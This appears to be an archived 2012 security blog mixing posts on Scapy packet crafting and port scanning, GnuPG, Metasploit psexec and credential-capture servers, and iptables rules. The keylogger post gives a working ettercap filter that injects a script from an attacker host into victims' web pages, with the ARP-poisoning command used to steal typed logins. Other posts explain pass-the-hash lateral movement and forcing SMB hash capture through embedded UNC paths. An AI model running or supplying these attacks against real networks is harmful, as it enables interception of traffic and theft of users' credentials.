Thursday, October 18, 2012

Scapy cheat sheet (by examples)

Building packets:

a =IP(dst="www.yahoo.com")
b = IP(dst="192.168.8.1",ttl=12)/UDP(dport=123)
c=Ether()/IP(dst="www.google.com")/TCP()/"GET /index.html HTTP/1.0 \n\n"
d=TCP(dport=80)

Stacking layers: "/"


>>> c=Ether()/a
>>> f=Ether()/IP()/d

>>> a=Ether()/IP(dst="www.yahoo.com")/TCP()/"GET /index.html HTTP/1.0 \n\n"

>>> a
<Ether  type=0x800 |<IP  frag=0 proto=tcp dst=Net('www.yahoo.com') |<TCP  |<Raw  load='GET /index.html HTTP/1.0 \n\n' |>>>>

>>> str(_)
'E\x00\x00C\x00\x01\x00\x00@\x06\xf0\xca\xc0\xa8\x00\x94W\xf8p\xb5\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x003\xc8\x00\x00GET /index.html HTTP/1.0 \n\n'

>>> b=Ether(_)
>>> b
<Ether  dst=45:00:00:43:00:01 src=00:00:40:06:f0:ca type=0xc0a8 |<Raw  load='\x00\x94W\xf8p\xb5\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x003\xc8\x00\x00GET /index.html HTTP/1.0 \n\n' |>>

>>> str(b)
'E\x00\x00C\x00\x01\x00\x00@\x06\xf0\xca\xc0\xa8\x00\x94W\xf8p\xb5\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x003\xc8\x00\x00GET /index.html HTTP/1.0 \n\n'

Actions on packets

CommandEffect
str(pkt)assemble the packet
hexdump(pkt)have an hexadecimal dump
ls(pkt)have the list of fields values
pkt.summary()for a one-line summary
pkt.show()for a developped view of the packet
pkt.show2()same as show but on the assembled packet (checksum is calculated, for instance)
pkt.sprintf()fills a format string with fields values of the packet
pkt.decode_payload_as()changes the way the payload is decoded
pkt.psdump()draws a PostScript diagram with explained dissection
pkt.pdfdump()draws a PDF with explained dissection
pkt.command()return a Scapy command that can generate the packet

Sending & Receiving

<send() function will send packets at layer 3, sendp() function will work at layer 2>

send(a)
send(IP(dst="10.1.1.1")/ICMP())
sendp(Ether()/IP(dst="1.2.3.4",ttl=(1,4)), iface="eth1")
sendp("some message", iface="eth1", loop=1, inter=0.2)

The sr() function is for sending packets and receiving answers.

sr( IP(dst="target", ttl=(10,20))/TCP(sport=RandShort()) )

to get the response;

res,unans=_
res.summary()

Results:


latest result: _

assigning results to variables>> "_=ans,unans"

actions on Results

CommandEffect
summary()displays a list of summaries of each packet
nsummary()same as previous, with the packet number
conversations()displays a graph of conversations
show()displays the prefered representation (usually nsummary())
filter()returns a packet list filtered with a lambda function
hexdump()returns a hexdump of all packets
hexraw()returns a hexdump of the Raw layer of all packets
padding()returns a hexdump of packets with padding
nzpadding()returns a hexdump of packets with non-zero padding
plot()plots a lambda function applied to the packet list
make table()displays a table according to a lambda function


Now with Scanning ports and Pinging IPs;

TCP port scan

scan 10.1.1.1 for open ports(from 1 to 100)

[1,100] >> 1 and 100. 
(1,100) >> from 1 to 100

>>> sr(IP(dst="10.1.1.1")/TCP(sport=RandShort(),dport=(1,100),flags="S"))
>>> ans,unans = _
>>> ans.summary()
>>> ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") )
>>> ans.nsummary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA")
>>> ans.summary(lfilter = lambda (s,r): r.sprintf("%TCP.flags%") == "SA",prn=lambda(s,r):r.sprintf("%TCP.sport% is open"))

>>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make_table(lambda (s,r):

ACK Scan

ans,unans = sr(IP(dst="10.10.1.1")/TCP(dport=[80,666],flags="A"))
ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") )

TCP Ping:

ans,unans=sr( IP(dst="10.10.1.*")/TCP(dport=80,flags="S") )
ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") )

ICMP Ping:

ans,unans=sr(IP(dst="10.10.1.1-254")/ICMP())
ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") )

Arp Ping:

res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"))
res.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%"))
arping()


Saturday, August 18, 2012

Injecting keylogger


Injecting keylogger

The Used Tools;
metasploit auxiliary module (http_javascript_keylogger)
ettercap

DEMO,

1- Run "http_javascript_keylogger" module

msf > use auxiliary/server/capture/http_javascript_keylogger



This auxiliary module create javascript which could be injected in web page to record the keys pressed by the user inside this page only, including his login credentials.

After running this module, it would give you a link. To use it, appaend "/anyname.js" , you name it anything you want.
I set URIPATH to "keylogger" ==> This is the link:

http://192.168.45.191:8080/keylogger/anyname.js
http://ip:SRVPORT/URIPATH/anyname.js

By now, you have your javascript link, How to inject it?

you could inject it via XSS or network spoofing.

I'll use ettercap to manipulate (by etterfilter) the wep pages on the network and inject my javacript

2- The filter script used for injection:


if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.dst == 80 || tcp.dst == 8080) {

 if (search(DATA.data, "Accept-Encoding")) {

 replace("Accept-Encoding", "Accept-Nothing!");

 }

}

if (ip.proto == TCP && ip.dst != '192.168.56.101' && tcp.src == 80 || tcp.src == 8080) {

 if (search(DATA.data, "<head>")){

 replace("<head>","<head><script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>");

 msg("Keylogger injected :) \n");

 }

 if (search(DATA.data, "<HEAD>")){

 replace("<HEAD>","<BHEAD><SCRIPT SRC='http://192.168.45.191:8080/keylogger/anything.js'> </script>");

 msg("Keylogger injected :) \n");

 }

}

This filter append "<script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>" to "<head>" which make it be loaded imediatly



3- save it as txt file, then compile with etterfilter to binary. This is MUST, because ettercap won't use ascii filter.
Use this command
etterfilter etterkeylogger -o etterkeylogger.ef"

where "etterkeylogger" is the file which contain the filter script and "etterkeylogger.ef" is the output binary file which is used by ettercap



4- The used ettercap command :

root@bt:~# ettercap -T -M arp -F etterkeylogger.ef /192.168.1.1/ /192.168.1.104/ 
where,
-T => for console mode
-M arp => for arp poisoning attack to redirect the traffic to your machine, (don't worry, it then forward the requests to the Web, so the victim won't notice any change)

-F etterkeylogger.ef => is the compiled binary filter script produced by etterfilter
/192.168.1.1/ => target 1 (default gateway)
/192.168.1.104/ = target 2 (victim)

The RESULT






Secure Communication for Dummies






















Monday, August 6, 2012

GnuPG [Encryption/Decryption messages]

GnuPG is a tool for secure communication.

GnuPG uses public-key cryptography so that users may communicate securely. In a public-key system, each user has a pair of keys consisting of a private key and a public key. A user's private key is kept secret; it need never be revealed. The public key may be given to anyone with whom the user wants to communicate. GnuPG uses a somewhat more sophisticated scheme in which a user has a primary keypair and then zero or more additional subordinate keypairs. The primary and subordinate keypairs are bundled to facilitate key management and the bundle can often be considered simply as one keypair.




N.Bs,
  • It's a PUBLIC/PRIVATE  key ENCRYPTION/DECRYPTION communication.
  • You generate public and private keys by one command.
  • You give the public key to others so that they communicate with you and you have your OWN private one.
  • Encryption with public keys, Decryption with private keys.
  • So, for example, if a SENDER on the other side wants to give you a message or email, he would simply use your public key (that you already EXPORTED to him). you decrypt it with your private key ;)
  • Passphrase(password) is used only to decrypt messages by the private key by the receiver(generator).
  • The key is exported in a binary format, but this can be inconvenient when the key is to be sent though email or published on a web page. GnuPG therefore supports a command-line option --armor that that causes output to be generated in an ASCII-armored format similar to uuencoded documents. In general, any output from GnuPG, e.g., keys, encrypted documents, and signatures, can be ASCII-armored by adding the --armor option.

DEMOs
The Environment;
backtrack machine to generate the key pair >> GnuPG 
windows machine to >> GPA (GNU Privacy Assistance )

[case one]backtrack is the RECEIVER, Windows is the SENDER

on backtrack;

generating the key

root@bt:~/gpg# gpg --gen-key



root@bt:~/gpg# gpg --list-secret-keys



Exporting the public key;


root@bt:~/gpg# gpg --output eaglepublickey.gpg --export   \\exports it as non-readable binary format

root@bt:~/gpg# gpg --output eaglepublickey.txt --export --armor \\exports it as readable ascii format


This is the key that you give to others so they could message you.

On Windows;

Copy the key from backtrack to windows 
Run "gpg4win" program (right)
Import
Select the files to encrypt: Windows tab >> File Manager (left)



To Decrypt the message;

You have only one private key, so you won't specify it, unlike encryption where you must specify(you would have many public keys)

[Case two]

On Windows (GPA);

keys tab >> new key >> [name: eaglewindows]
Keys tab >> export key >>

On backtrack;

copy the key to backtrack
root@bt:~/gpg# gpg --import /root/Desktop/key
root@bt:~/gpg# gpg --output encryptedmessage.gpg --encrypt --recipient eaglewindows
root@bt:~/gpg# gpg --output encryptedmessage.gpg --encrypt --recipient eaglewindows messagetowindows

On Windows;

Windows tab >> File Manager 
decrypt
put your password












Friday, August 3, 2012

exploit/windows/smb/psexec

Microsoft Windows Authenticated User Code Execution

"This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description."

So all you need is an administrator account credentials

PsExec is a light-weight telnet-replacement that lets you execute processes on remote systems.
e.g:  psexec \\ZEAGLE -u test -p test ipconfig

which execute "ipconfig" command on remote computer "ZEAGLE" with ADMINISTRATOR (must be  administrator ) account "test" and password "test".




One great method with psexec in metasploit is it allows you to enter the password itself, or you can simply just specify the hash values, no need to crack to gain access to the system. Let's think deeply about how we can utilize this attack to further penetrate a network. Lets first say we compromise a system that has an administrator password on the system, we don't need to crack it because psexec allows us to utilize just the hash values, that administrator account is the same on every account within the domain infrastructure. We can now go from system to system without ever having to worry about cracking the password. One important thing to note on this is that if NTLM is only available (for example its a 15+ character password or through GPO they specify NTLM response only), simply replace the ****NOPASSWORD**** with 32 0's for example:
******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c
Would be replaced by:
00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c




Wednesday, August 1, 2012

auxiliary/server/capture/XXXX part-1



auxiliary/server/capture/ftp

This module provides a fake FTP service that is designed to capture authentication credentials.
I've used FileZilla for logins

[used FileZilla to pentest login]




auxiliary/server/capture/smb


This module provides a FAKE SMB service that can be used to capture the challenge-response password hashes of SMB client systems.

Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch).

To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

SMB: Server Message Block (SMB), also known as Common Internet File System (CIFS) used for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.

http://en.wikipedia.org/wiki/Server_Message_Block

http://oss.sgi.com/LDP/HOWTO/SMB-HOWTO-8.html

To test accessing the fake server and put the password »
smbclient -L [serverip] -U [username]
smbclient -L 192.168.45.1 -U test


To crack the password hash »
john JOHNPWFILE






auxiliary/server/capture/pop3

This module provides a fake POP3 service that is designed to capture authentication credentials.



[used Microsoft Outlook for pentest login]






auxiliary/server/capture/telnet

auxiliary/server/capture/smtp





 


Tuesday, July 31, 2012

25 Most Frequently Used Linux IPTables Rules Examples


# Modify this file accordingly for your specific requirement.
# http://www.thegeekstuff.com
# 1. Delete all existing rules
iptables -F

# 2. Set default chain policies
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP

# 3. Block a specific ip-address
#BLOCK_THIS_IP="x.x.x.x"
iptables -A INPUT -s "$BLOCK_THIS_IP" -j DROP

# 4. Allow ALL incoming SSH
iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

# 5. Allow incoming SSH only from a sepcific network
iptables -A INPUT -i eth0 -p tcp -s 192.168.200.0/24 --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

# 6. Allow incoming HTTP
iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

# Allow incoming HTTPS
iptables -A INPUT -i eth0 -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT

# 7. MultiPorts (Allow incoming SSH, HTTP, and HTTPS)
iptables -A INPUT -i eth0 -p tcp -m multiport --dports 22,80,443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -m multiport --sports 22,80,443 -m state --state ESTABLISHED -j ACCEPT

# 8. Allow outgoing SSH
iptables -A OUTPUT -o eth0 -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

# 9. Allow outgoing SSH only to a specific network
iptables -A OUTPUT -o eth0 -p tcp -d 192.168.101.0/24 --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

# 10. Allow outgoing HTTPS
iptables -A OUTPUT -o eth0 -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i eth0 -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT

# 11. Load balance incoming HTTPS traffic
iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 0 -j DNAT --to-destination 192.168.1.101:443
iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 1 -j DNAT --to-destination 192.168.1.102:443
#iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 2 -j DNAT --to-destination 192.168.1.103:443

# 12. Ping from inside to outside
iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-reply -j ACCEPT

# 13. Ping from outside to inside
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT

# 14. Allow loopback access
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

# 15. Allow packets from internal network to reach external network.
# if eth1 is connected to external network (internet)
# if eth0 is connected to internal network (192.168.1.x)
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT

# 16. Allow outbound DNS
#iptables -A OUTPUT -p udp -o eth0 --dport 53 -j ACCEPT
#iptables -A INPUT -p udp -i eth0 --sport 53 -j ACCEPT

# 17. Allow NIS Connections
# rpcinfo -p | grep ypbind ; This port is 853 and 850
#iptables -A INPUT -p tcp --dport 111 -j ACCEPT
#iptables -A INPUT -p udp --dport 111 -j ACCEPT
#iptables -A INPUT -p tcp --dport 853 -j ACCEPT
#iptables -A INPUT -p udp --dport 853 -j ACCEPT
#iptables -A INPUT -p tcp --dport 850 -j ACCEPT
#iptables -A INPUT -p udp --dport 850 -j ACCEPT

# 18. Allow rsync from a specific network
iptables -A INPUT -i eth0 -p tcp -s 192.168.101.0/24 --dport 873 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 873 -m state --state ESTABLISHED -j ACCEPT

# 19. Allow MySQL connection only from a specific network
iptables -A INPUT -i eth0 -p tcp -s 192.168.200.0/24 --dport 3306 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 3306 -m state --state ESTABLISHED -j ACCEPT

# 20. Allow Sendmail or Postfix
iptables -A INPUT -i eth0 -p tcp --dport 25 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT

# 21. Allow IMAP and IMAPS
iptables -A INPUT -i eth0 -p tcp --dport 143 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 143 -m state --state ESTABLISHED -j ACCEPT

iptables -A INPUT -i eth0 -p tcp --dport 993 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 993 -m state --state ESTABLISHED -j ACCEPT

# 22. Allow POP3 and POP3S
iptables -A INPUT -i eth0 -p tcp --dport 110 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT

iptables -A INPUT -i eth0 -p tcp --dport 995 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 995 -m state --state ESTABLISHED -j ACCEPT

# 23. Prevent DoS attack
iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT

# 24. Port forwarding 422 to 22
iptables -t nat -A PREROUTING -p tcp -d 192.168.102.37 --dport 422 -j DNAT --to 192.168.102.37:22
iptables -A INPUT -i eth0 -p tcp --dport 422 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -o eth0 -p tcp --sport 422 -m state --state ESTABLISHED -j ACCEPT

# 25. Log dropped packets
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables Packet Dropped: " --log-level 7
iptables -A LOGGING -j DROP